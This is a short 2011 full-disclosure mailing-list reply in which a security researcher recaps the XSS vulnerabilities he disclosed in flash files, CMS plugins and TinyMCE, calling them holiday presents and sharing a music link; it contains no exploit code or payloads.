Date: Fri, 30 Dec 2011 23:55:03 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: "Antony widmal" <antony.widmal@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Vulnerabilities in plugins for MODx CMS, XOOPS,
	uCoz, Magento and DSP CMS

Hello Antony!

You are welcome.

All those XSS vulnerabilities in 34 millions flash files, and all those
vulnerable plugins for different engines with vulnerable swf-file, which
I've wrote about during 2010-2011, including last five plugins, and those
vulnerabilities in TinyMCE (on tens millions of web sites, only on WordPress
there are more then 67 millions of affected web sites), and all those
vulnerabilities disclosed by me in 2011, and that new version of plugin
Register Plus Redux (with fixed all holes), which I wrote about in the last
advisory - all these are my presents. So Merry Christmas and Happy New Year!

Of course I wish good music for everyone for holidays. Like this one:
http://soundcloud.com/mustlive/mega-mix-4

Best wishes & regards,
MustLive
Administrator of Websecurity web site